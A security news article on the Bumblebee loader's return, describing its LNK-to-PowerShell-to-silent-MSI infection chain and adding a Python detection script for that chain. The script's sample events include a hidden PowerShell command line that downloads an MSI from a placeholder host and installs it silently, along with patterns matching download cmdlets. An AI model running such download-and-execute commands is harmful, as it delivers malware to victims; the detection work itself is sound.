After several months of silence, the Bumblebee malware loader has re-emerged in a new set of cybercriminal operations.
This malware, allegedly authored by the TrickBot group, first appeared in 2022, and researchers deemed it an alternative to the BazarLoader backdoor. It has also given ransomware operators access to targeted networks.
Researchers explained that the Bumblebee loader primarily infects users via phishing, malvertising, and SEO poisoning to promote various apps. Its standard payloads include infostealers, Cobalt Strike beacons, and various ransomware strains.
A multinational law enforcement operation, Operation Endgame, confiscated over a hundred servers serving several malware loader operations earlier this year. Since then, Bumblebee has gone on a hiatus.
However, some researchers have reported new Bumblebee activity in the threat landscape, sparking speculation about its re-emergence.
The latest Bumblebee malware campaign still leverages phishing tactics.
According to reports, the current Bumblebee malware operation starts with a phishing email that deceives targeted users into downloading a malicious ZIP bundle.
Researchers noted that this ZIP file contains a .LNK shortcut called Report-41952.lnk, which prompts PowerShell to download a malicious .MSI file that poses as a valid NVIDIA driver update or Midjourney installer from a remote server.
The new operation then executes the MSI file in the background with msiexec.exe and the /qn option (quiet mode, no user interface), so the installation proceeds without any user interaction. The package also uses the SelfReg table within the MSI structure, which tells msiexec.exe to load the DLL into its own address space and call its exported DllRegisterServer function, so no additional process is launched.
Once the process loads and executes the DLL, the malware begins the unpacking procedure, which deploys the Bumblebee malware into memory.
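The chain described above (LNK shortcut, PowerShell download, silent msiexec run from a user-writable path) leaves a recognisable trail in process-creation telemetry. The following detection script is an added example written for this article; it is not code from the original report or from the researchers cited. It assumes Sysmon-style process-creation fields (pid, parent pid, image path, command line, user), and the sample events, paths and the URL host are constructed for illustration.

```python
"""Detection example for the LNK -> PowerShell -> silent msiexec chain.

Constructed sample telemetry; the field layout mirrors Sysmon Event ID 1
(process creation) but the events themselves are invented for this example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str
    user: str


# Scripting hosts that should rarely be the parent of a silent installer.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# msiexec switches that suppress the installer UI (/qn, /quiet, /q).
QUIET_FLAGS = re.compile(r"(?<!\S)/(?:qn|quiet|q)\b", re.IGNORECASE)

# Locations a phishing-delivered package typically lands in.
USER_WRITABLE = re.compile(r"\\(?:Temp|Downloads|AppData)\\", re.IGNORECASE)

# Download primitives commonly seen in PowerShell one-liners.
DOWNLOAD_CMDLETS = re.compile(
    r"(?:Invoke-WebRequest|iwr|curl|wget|DownloadFile|DownloadString|Start-BitsTransfer)",
    re.IGNORECASE)

# Constructed sample events (not real telemetry). pids 1000-2100 model the
# phishing chain; pids 3000-3100 model a benign silent install pushed by a
# software-deployment agent, which must not be flagged.
SAMPLE_EVENTS = [
    ProcessEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\alice"),
    ProcessEvent(2000, 1000,
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "iwr http://example.invalid/upd.msi '
                 '-OutFile $env:TEMP\\upd.msi; msiexec /i $env:TEMP\\upd.msi /qn"',
                 r"CORP\alice"),
    ProcessEvent(2100, 2000, r"C:\Windows\System32\msiexec.exe",
                 r"msiexec /i C:\Users\alice\AppData\Local\Temp\upd.msi /qn",
                 r"CORP\alice"),
    ProcessEvent(3000, 1, r"C:\Windows\CCM\CcmExec.exe", "CcmExec.exe",
                 r"NT AUTHORITY\SYSTEM"),
    ProcessEvent(3100, 3000, r"C:\Windows\System32\msiexec.exe",
                 r"msiexec /i \\deploy\share\app.msi /qn", r"NT AUTHORITY\SYSTEM"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcessEvent]) -> List[Dict]:
    """Return one finding per event that matches a rule, with the reasons."""
    by_pid = {e.pid: e for e in events}
    findings: List[Dict] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""

        # Rule 1: silent msiexec whose parent is a scripting host, or whose
        # package sits in a user-writable directory.
        if name == "msiexec.exe" and QUIET_FLAGS.search(e.cmdline):
            reasons = []
            if parent_name in SCRIPT_HOSTS:
                reasons.append(f"silent msiexec spawned by {parent_name}")
            if USER_WRITABLE.search(e.cmdline):
                reasons.append("MSI package in a user-writable directory")
            if reasons:
                findings.append({"pid": e.pid, "rule": "suspicious_silent_msi",
                                 "reasons": reasons})

        # Rule 2: a scripting host that downloads an .msi in the same command.
        if (name in SCRIPT_HOSTS and DOWNLOAD_CMDLETS.search(e.cmdline)
                and re.search(r"\.msi\b", e.cmdline, re.IGNORECASE)):
            findings.append({"pid": e.pid, "rule": "script_host_downloads_msi",
                             "reasons": ["download primitive and .msi in command line"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

Correlating the msiexec event with its parent is what keeps the rule quiet on legitimate silent installs: the deployment-agent case above also uses /qn but is launched from a system service against a share, so neither reason fires. Because the SelfReg technique keeps the payload inside msiexec.exe rather than spawning a child, the msiexec event itself is the last process-creation signal in this chain; later visibility has to come from module-load or network telemetry on that process.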
Furthermore, the Bumblebee payload includes its characteristic internal DLL and exported function naming scheme and the configuration extraction methods used in its previous version.
As of now, the initial investigation has not disclosed any further details about the payloads dropped by the new Bumblebee malware operation. The scale of this latest campaign is still unknown, but the report suggests it could grow and compromise more organisations.